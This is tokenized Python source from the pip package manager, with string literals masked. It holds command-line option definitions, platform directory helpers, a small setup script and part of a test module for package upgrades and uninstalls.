<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from functools import partial <EOL> from optparse import OptionGroup , SUPPRESS_HELP , Option <EOL> import warnings <EOL> from pip . index import ( <EOL> FormatControl , fmt_ctl_handle_mutual_exclude , fmt_ctl_no_binary , <EOL> fmt_ctl_no_use_wheel ) <EOL> from pip . models import PyPI <EOL> from pip . locations import USER_CACHE_DIR , src_prefix <EOL> from pip . utils . hashes import STRONG_HASHES <EOL> def make_option_group ( group , parser ) : <EOL> """<STR_LIT>""" <EOL> option_group = OptionGroup ( parser , group [ '<STR_LIT:name>' ] ) <EOL> for option in group [ '<STR_LIT>' ] : <EOL> option_group . add_option ( option ( ) ) <EOL> return option_group <EOL> def resolve_wheel_no_use_binary ( options ) : <EOL> if not options . use_wheel : <EOL> control = options . format_control <EOL> fmt_ctl_no_use_wheel ( control ) <EOL> def check_install_build_global ( options , check_options = None ) : <EOL> """<STR_LIT>""" <EOL> if check_options is None : <EOL> check_options = options <EOL> def getname ( n ) : <EOL> return getattr ( check_options , n , None ) <EOL> names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> if any ( map ( getname , names ) ) : <EOL> control = options . format_control <EOL> fmt_ctl_no_binary ( control ) <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , stacklevel = <NUM_LIT:2> ) <EOL> help_ = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> isolated_mode = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) , <EOL> ) <EOL> require_virtualenv = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = SUPPRESS_HELP ) <EOL> verbose = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:count>' , <EOL> default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> version = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT:version>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> quiet = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:count>' , <EOL> default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> log = partial ( <EOL> Option , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> metavar = "<STR_LIT:path>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> no_input = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = SUPPRESS_HELP ) <EOL> proxy = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> retries = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:int>' , <EOL> default = <NUM_LIT:5> , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> timeout = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:float>' , <EOL> default = <NUM_LIT:15> , <EOL> help = '<STR_LIT>' ) <EOL> default_vcs = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = SUPPRESS_HELP ) <EOL> skip_requirements_regex = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = '<STR_LIT>' , <EOL> help = SUPPRESS_HELP ) <EOL> def exists_action ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT:s>' , '<STR_LIT:i>' , '<STR_LIT:w>' , '<STR_LIT:b>' ] , <EOL> default = [ ] , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT:action>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cert = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> metavar = '<STR_LIT:path>' , <EOL> help = "<STR_LIT>" ) <EOL> client_cert = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> type = '<STR_LIT:str>' , <EOL> default = None , <EOL> metavar = '<STR_LIT:path>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> index_url = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = PyPI . simple_url , <EOL> help = '<STR_LIT>' ) <EOL> def extra_index_url ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> no_index = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def find_links ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:url>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def allow_external ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = [ ] , <EOL> metavar = "<STR_LIT>" , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> allow_all_external = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def trusted_host ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> metavar = "<STR_LIT>" , <EOL> default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> no_allow_external = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def allow_unsafe ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = [ ] , <EOL> metavar = "<STR_LIT>" , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> no_allow_unsafe = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> default = False , <EOL> help = SUPPRESS_HELP <EOL> ) <EOL> process_dependency_links = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> def constraints ( ) : <EOL> return Option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:file>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def requirements ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT:file>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def editable ( ) : <EOL> return Option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> metavar = '<STR_LIT>' , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> src = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = src_prefix , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> use_wheel = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = True , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> no_use_wheel = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = True , <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> def _get_format_control ( values , option ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( values , option . dest ) <EOL> def _handle_no_binary ( option , opt_str , value , parser ) : <EOL> existing = getattr ( parser . values , option . dest ) <EOL> fmt_ctl_handle_mutual_exclude ( <EOL> value , existing . no_binary , existing . only_binary ) <EOL> def _handle_only_binary ( option , opt_str , value , parser ) : <EOL> existing = getattr ( parser . values , option . dest ) <EOL> fmt_ctl_handle_mutual_exclude ( <EOL> value , existing . only_binary , existing . no_binary ) <EOL> def no_binary ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> callback = _handle_no_binary , type = "<STR_LIT:str>" , <EOL> default = FormatControl ( set ( ) , set ( ) ) , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def only_binary ( ) : <EOL> return Option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> callback = _handle_only_binary , type = "<STR_LIT:str>" , <EOL> default = FormatControl ( set ( ) , set ( ) ) , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cache_dir = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> default = USER_CACHE_DIR , <EOL> metavar = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> ) <EOL> no_cache = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> no_deps = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" ) <EOL> build_dir = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> install_options = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> global_options = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> no_clean = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" ) <EOL> pre = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> disable_pip_version_check = partial ( <EOL> Option , <EOL> "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> always_unzip = partial ( <EOL> Option , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = SUPPRESS_HELP , <EOL> ) <EOL> def _merge_hash ( option , opt_str , value , parser ) : <EOL> """<STR_LIT>""" <EOL> if not parser . values . hashes : <EOL> parser . values . hashes = { } <EOL> try : <EOL> algo , digest = value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> parser . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> opt_str ) <EOL> if algo not in STRONG_HASHES : <EOL> parser . error ( '<STR_LIT>' % <EOL> ( opt_str , '<STR_LIT:U+002CU+0020>' . join ( STRONG_HASHES ) ) ) <EOL> parser . values . hashes . setdefault ( algo , [ ] ) . append ( digest ) <EOL> hash = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> callback = _merge_hash , <EOL> type = '<STR_LIT:string>' , <EOL> help = "<STR_LIT>" <EOL> '<STR_LIT>' ) <EOL> require_hashes = partial ( <EOL> Option , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> general_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> help_ , <EOL> isolated_mode , <EOL> require_virtualenv , <EOL> verbose , <EOL> version , <EOL> quiet , <EOL> log , <EOL> no_input , <EOL> proxy , <EOL> retries , <EOL> timeout , <EOL> default_vcs , <EOL> skip_requirements_regex , <EOL> exists_action , <EOL> trusted_host , <EOL> cert , <EOL> client_cert , <EOL> cache_dir , <EOL> no_cache , <EOL> disable_pip_version_check , <EOL> ] <EOL> } <EOL> non_deprecated_index_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> index_url , <EOL> extra_index_url , <EOL> no_index , <EOL> find_links , <EOL> process_dependency_links , <EOL> ] <EOL> } <EOL> index_group = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : non_deprecated_index_group [ '<STR_LIT>' ] + [ <EOL> allow_external , <EOL> allow_all_external , <EOL> no_allow_external , <EOL> allow_unsafe , <EOL> no_allow_unsafe , <EOL> ] <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import os <EOL> import sys <EOL> from pip . compat import WINDOWS , expanduser <EOL> def user_cache_dir ( appname ) : <EOL> r"""<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = os . path . normpath ( _get_win_folder ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname , "<STR_LIT>" ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = expanduser ( "<STR_LIT>" ) <EOL> path = os . path . join ( path , appname ) <EOL> else : <EOL> path = os . getenv ( "<STR_LIT>" , expanduser ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname ) <EOL> return path <EOL> def user_data_dir ( appname , roaming = False ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> const = roaming and "<STR_LIT>" or "<STR_LIT>" <EOL> path = os . path . join ( os . path . normpath ( _get_win_folder ( const ) ) , appname ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = os . path . join ( <EOL> expanduser ( '<STR_LIT>' ) , <EOL> appname , <EOL> ) <EOL> else : <EOL> path = os . path . join ( <EOL> os . getenv ( '<STR_LIT>' , expanduser ( "<STR_LIT>" ) ) , <EOL> appname , <EOL> ) <EOL> return path <EOL> def user_config_dir ( appname , roaming = True ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = user_data_dir ( appname , roaming = roaming ) <EOL> elif sys . platform == "<STR_LIT>" : <EOL> path = user_data_dir ( appname ) <EOL> else : <EOL> path = os . getenv ( '<STR_LIT>' , expanduser ( "<STR_LIT>" ) ) <EOL> path = os . path . join ( path , appname ) <EOL> return path <EOL> def site_config_dirs ( appname ) : <EOL> """<STR_LIT>""" <EOL> if WINDOWS : <EOL> path = os . path . normpath ( _get_win_folder ( "<STR_LIT>" ) ) <EOL> pathlist = [ os . path . join ( path , appname ) ] <EOL> elif sys . platform == '<STR_LIT>' : <EOL> pathlist = [ os . path . join ( '<STR_LIT>' , appname ) ] <EOL> else : <EOL> xdg_config_dirs = os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if xdg_config_dirs : <EOL> pathlist = [ <EOL> os . path . join ( expanduser ( x ) , appname ) <EOL> for x in xdg_config_dirs . split ( os . pathsep ) <EOL> ] <EOL> else : <EOL> pathlist = [ ] <EOL> pathlist . append ( '<STR_LIT>' ) <EOL> return pathlist <EOL> def _get_win_folder_from_registry ( csidl_name ) : <EOL> """<STR_LIT>""" <EOL> import _winreg <EOL> shell_folder_name = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } [ csidl_name ] <EOL> key = _winreg . OpenKey ( <EOL> _winreg . HKEY_CURRENT_USER , <EOL> r"<STR_LIT>" <EOL> ) <EOL> directory , _type = _winreg . QueryValueEx ( key , shell_folder_name ) <EOL> return directory <EOL> def _get_win_folder_with_ctypes ( csidl_name ) : <EOL> csidl_const = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } [ csidl_name ] <EOL> buf = ctypes . create_unicode_buffer ( <NUM_LIT> ) <EOL> ctypes . windll . shell32 . SHGetFolderPathW ( None , csidl_const , None , <NUM_LIT:0> , buf ) <EOL> has_high_char = False <EOL> for c in buf : <EOL> if ord ( c ) > <NUM_LIT:255> : <EOL> has_high_char = True <EOL> break <EOL> if has_high_char : <EOL> buf2 = ctypes . create_unicode_buffer ( <NUM_LIT> ) <EOL> if ctypes . windll . kernel32 . GetShortPathNameW ( buf . value , buf2 , <NUM_LIT> ) : <EOL> buf = buf2 <EOL> return buf . value <EOL> if WINDOWS : <EOL> try : <EOL> import ctypes <EOL> _get_win_folder = _get_win_folder_with_ctypes <EOL> except ImportError : <EOL> _get_win_folder = _get_win_folder_from_registry </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> ) </s>
<s> import os <EOL> import sys <EOL> import textwrap <EOL> import pytest <EOL> from tests . lib import ( <EOL> assert_all_changes , pyversion , _create_test_package , <EOL> _change_test_package_version , <EOL> ) <EOL> from tests . lib . local_repos import local_checkout <EOL> def test_no_upgrade_unless_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert not result . files_created , ( <EOL> '<STR_LIT>' <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_to_specific_version ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , ( <EOL> '<STR_LIT>' <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_deleted <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_created <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_if_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , '<STR_LIT>' <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion not in result . files_created <EOL> ) <EOL> def test_upgrade_with_newest_already_installed ( script , data ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert not result . files_created , '<STR_LIT>' <EOL> assert '<STR_LIT>' in result . stdout , result . stdout <EOL> @ pytest . mark . network <EOL> def test_upgrade_force_reinstall_newest ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert result2 . files_updated , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_uninstall_before_upgrade ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result2 . files_created , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_uninstall_before_upgrade_from_url ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert result2 . files_created , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_to_same_version_from_url ( script ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , ( <EOL> sorted ( result . files_created . keys ( ) ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert not result2 . files_updated , '<STR_LIT>' <EOL> result3 = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert_all_changes ( result , result3 , [ script . venv / '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_from_reqs_file ( script ) : <EOL> """<STR_LIT>""" <EOL> script . scratch_path . join ( "<STR_LIT>" ) . write ( textwrap . dedent ( """<STR_LIT>""" ) ) <EOL> install_result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' <EOL> ) <EOL> script . scratch_path . join ( "<STR_LIT>" ) . write ( textwrap . dedent ( """<STR_LIT>""" ) ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' <EOL> ) <EOL> uninstall_result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , script . scratch_path / '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert_all_changes ( <EOL> install_result , <EOL> uninstall_result , <EOL> [ script . venv / '<STR_LIT>' , '<STR_LIT>' , script . scratch / '<STR_LIT>' ] , <EOL> ) <EOL> def test_uninstall_rollback ( script , data ) : <EOL> """<STR_LIT>""" <EOL> result = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> assert script . site_packages / '<STR_LIT>' in result . files_created , list ( <EOL> result . files_created . keys ( ) <EOL> ) <EOL> result2 = script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , data . find_links , '<STR_LIT>' , '<STR_LIT>' , <EOL> expect_error = True , <EOL> ) <EOL> assert result2 . returncode == <NUM_LIT:1> , str ( result2 ) <EOL> assert script . run ( <EOL> '<STR_LIT>' , '<STR_LIT:-c>' , "<STR_LIT>" <EOL> ) . stdout == '<STR_LIT>' <EOL> assert_all_changes ( <EOL> result . files_after , <EOL> result2 , <EOL> [ script . venv / '<STR_LIT>' ] , <EOL> ) <EOL> @ pytest . mark . skipif <EOL> def test_editable_git_upgrade ( script ) : <EOL> """<STR_LIT>""" <EOL> version_pkg_path = _create_test_package ( script ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % ( '<STR_LIT>' + version_pkg_path ) , <EOL> ) <EOL> version = script . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in version . stdout <EOL> _change_test_package_version ( script , version_pkg_path ) <EOL> script . pip ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % ( '<STR_LIT>' + version_pkg_path ) , <EOL> ) <EOL> version2 = script . run ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in version2 . stdout , ( <EOL> "<STR_LIT>" % ( version2 . stdout ) <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_should_not_install_always_from_cache ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion not in result . files_created <EOL> ) <EOL> assert ( <EOL> script . site_packages / '<STR_LIT>' % <EOL> pyversion in result . files_created <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_install_with_ignoreinstalled_requested ( script ) : <EOL> """<STR_LIT>""" <EOL> script . pip ( '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> result = script . pip ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , expect_error = True ) <EOL> assert result . files_created , '<STR_LIT>' <EOL> assert os . path . exists ( <EOL> script . site_packages_path / '<STR_LIT>' % pyversion <EOL> ) <EOL> assert os . path . exists ( <EOL> script . site_packages_path / '<STR_LIT>' % pyversion <EOL> ) <EOL> @ pytest . mark . network <EOL> def test_upgrade_vcs_req_with_no_dists_found ( script , tmpdir ) : <EOL> """<STR_LIT>""" <EOL> req = "<STR_LIT>" % local_checkout ( <EOL> "<STR_LIT>" , <EOL> tmpdir . join ( "<STR_LIT>" ) , <EOL> ) <EOL> script . pip ( "<STR_LIT>" , req ) <EOL> result = script . pip ( "<STR_LIT>" , "<STR_LIT>" , req ) <EOL> assert not result . returncode <EOL> @ pytest . mark . network <EOL> def test_upgrade_vcs_req_with_dist_found ( script ) : <EOL> """<STR_LIT>""" <EOL> req = ( <EOL> "<STR_LIT>" % <EOL> ( <EOL> "<STR_LIT>" 